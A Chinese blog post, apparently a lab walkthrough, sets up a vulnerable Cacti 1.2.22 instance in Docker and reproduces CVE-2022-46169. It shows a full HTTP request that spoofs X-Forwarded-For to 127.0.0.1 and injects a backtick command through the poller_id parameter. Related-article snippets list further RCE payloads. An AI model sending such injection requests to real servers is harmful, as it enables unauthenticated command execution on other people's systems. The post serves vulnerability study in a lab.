RCE漏洞

最新推荐文章于 2025-12-31 14:52:56 发布
原创 最新推荐文章于 2025-12-31 14:52:56 发布 · 192 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络

一、下载cacti漏洞环境

在虚拟机中的 /vulhub/cacti/CVE-2022-46169目录下输入以下命令下载漏洞安装包:

wget https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.22.zip

下载完后用unzip命令解压
执行以下命令以启动 Cacti 服务器 1.2.22:

docker compose up -d

使用docker images命令发现启动成功

在浏览器输入ip地址加8080端口号进行安装
http://192.168.244.141:8080/
输入默认账户密码
admin进入安装界面

安装成功

创建新的图表

二、漏洞实操

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

然后我们就可以开始抓包进行打印了
在浏览器中输入

http://192.168.241.131:8080/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success%E2%80%98

并用burpsuite对它进行抓包

查看一下是否绕过,在remote_agent.php文件中的 $client_addr = get_client_addr();下插入print_r($client_addr);获取客户端的值是否为127.0.0.1

$client_name = gethostbyaddr($client_addr);下插入print_r($client_name);打印出是否为hostname值并exit中断程序

burpsuite进行发送并查看打印值是否正确

XWHTD
关注
rce漏洞测试
m0_74377868的博客
03-28 1252
漏洞介绍RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE主要指远程代码执行和远程命令执行,CTFHub中将文件包含漏洞也看作RCE漏洞漏洞分类远程命令执行远程代码执行文件包含漏洞实际上,RCE主要是remote code execute(远程代码执行)和remote command execute(远程命令执行)的缩写,但有时把文件包含漏洞也归为其中。命令执行和代码执行的联系及区别。
web渗透:RCE漏洞
weixin_68416970的博客
09-05 1789
RCE漏洞,即远程代码执行漏洞,是一种安全缺陷,它允许攻击者通过网络在目标系统上执行任意代码。一旦成功利用,攻击者可以完全控制受影响的系统,包括读取敏感数据、安装恶意软件、修改系统配置等。RCE漏洞通常发生在应用程序处理用户输入时未能正确校验和过滤输入数据,从而导致攻击者能够注入并执行恶意代码。RCE漏洞的危害非常大,因为它们可以被用来获取服务器权限、窃取数据、部署恶意软件等。攻击者可以利用这些漏洞发起连锁攻击,以已经被入侵的系统为立足点,辐射攻击网络中其他存在问题的设备。
rce漏洞
2201_75749194的博客
03-29 527
首先通过c参数传递一个动态文件包含值,由于c参数过滤了左括号(,所以再文件包含时可以不写()符号再通过此值传递协议,进行相关代码或者命令执行payload:c=include$_GET["a"]?33:preg_match函数中\(,表示过滤左括号,过滤了单引号和双引号自己传递整数即可payload:c=include$_GET[1]?
RCE漏洞分析
若有战,召必回
11-08 2484
但是由于jar包的名字里面有版本号,而由于版本号的不同,会导致查看不同的时候不会展示不同版本的jar包之间的差异,因此我们需要对版本号进行处理,可以是把它删掉,也可以是替换成x.x.x。这个漏洞官方说需要验证,但是这个功能点是管理员组用户才具有的,因此普通用户账户应当是无法利用的,并且我也没找到其他地方存在配置代码宏这个功能对应的函数,不排除我落了某些地方;那官方是怎么修复的呢?当然,部分jar包的版本号是4位的,不过比较少,我就懒得改脚本了,万一真遇到了就最后单独分析看看。
RCE漏洞详解
2402_86373248的博客
05-06 654
定义:远程代码执行(Remote Code Execution,RCE漏洞允许攻击者通过构造恶意输入,在目标服务器或应用程序上执行任意命令或代码。- 危害:可导致服务器完全失陷、数据泄露、内网横向渗透、恶意软件植入等,是最高危的漏洞类型之一。
Microsoft Exchange Server的RCE漏洞
m0_73399576的博客
07-12 1066
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
RCE漏洞简介
记录学习
06-02 1691
rce漏洞简介
ThinkPHP3.2.x RCE漏洞通报1
08-03
【ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
精选资源
漏洞原理RCE漏洞_rce漏洞危害-优快云博客.pdf
02-24
RCE漏洞通常存在于Web应用程序和服务器软件中。攻击者可以通过利用输入验证不当或权限验证的缺失来利用这些漏洞。远程代码执行漏洞的存在可能导致数据泄露、拒绝服务、远程控制和横向移动等严重后果。 攻击者通过...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1....通过以上分析可以看出,ThinkPHP 5.0.x/5.1.x中的变量覆盖RCE漏洞是由于不安全的数据处理和变量管理造成的。开发者应加强对框架内部实现的理解,并遵循最佳安全实践,以减少类似的安全风险。
【java入门到放弃】网络
WZDBXHNL的博客
12-28 1073
防火墙既可以是硬件,也可以是软件,本质上是一种,而不是只能对应某一种形态。
iOS 抓包工具有哪些?不同类型的抓包工具可以做什么
最新发布
2501_91510632的博客
12-31 590
本文从真实工程实践出发,围绕“iOS 抓包工具有哪些”这一问题,讨论了代理抓包、设备侧抓包和数据流分析在不同阶段的分工与协作方式。
手写TCP/IP协议栈——实现ping响应不可达
Tandy12356_的博客
12-27 518
打开Tftp32软件,选择Tftp Client选项,配置目的主机的IP地址,下面几个内容随便填。对方检查校验和出现问题就直接丢包了,不会给我们回应,但是可以使用wireshark提醒。同时对于TCP和UDP的校验和检查也可以提前勾选上(后面会用到)编辑 -> 首选项 -> 协议 -> IPV4 勾上校验和检查。wireshark抓包ICMP不可达响应截图。点击Get之后可以向目的主机发送请求。
HTTP协议详解
2301_79551553的博客
12-30 764
URL的编码与反编码、HTTP协议请求与响应的格式、HTTP方法、HTTP状态码、HTTP1.0/1.1、HTTP请求报头,post和get用于传输数据的区别
小迪安全笔记_第4天|扩展&整理|30+种加密编码进制全解析:特点、用处与实战识别指南|小迪安全笔记|网络安全|
weixin_45635831的博客
12-30 960
"32位MD5/NTLM,40位SHA1,64位SHA256;Base64带=,URL带%,Hex无符号,JSFuck全符号!"MD5存密码?漏洞在手!Base64当加密?直接解码走!NTLM看ccef,SHA256更安全!
FW基本概述
汤小萌的博客
12-26 782
1. 基于五元组的访问控制(最基础且核心)这是防火墙策略的基石。源IP地址目的IP地址源端口号目的端口号协议类型(如TCP、UDP、ICMP)通过这五元组,防火墙可以制定极其精细的策略,例如:“只允许财务部的IP段访问服务器的TCP 443端口,其他一律拒绝2. 基于用户/用户组的控制现代防火墙能将IP地址与具体用户身份绑定。策略可以写成:“允许‘市场部员工组’在上班时间访问‘社交媒体应用类’”,而不是写一串复杂的IP地址。这大大提升了策略的可读性和管理效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值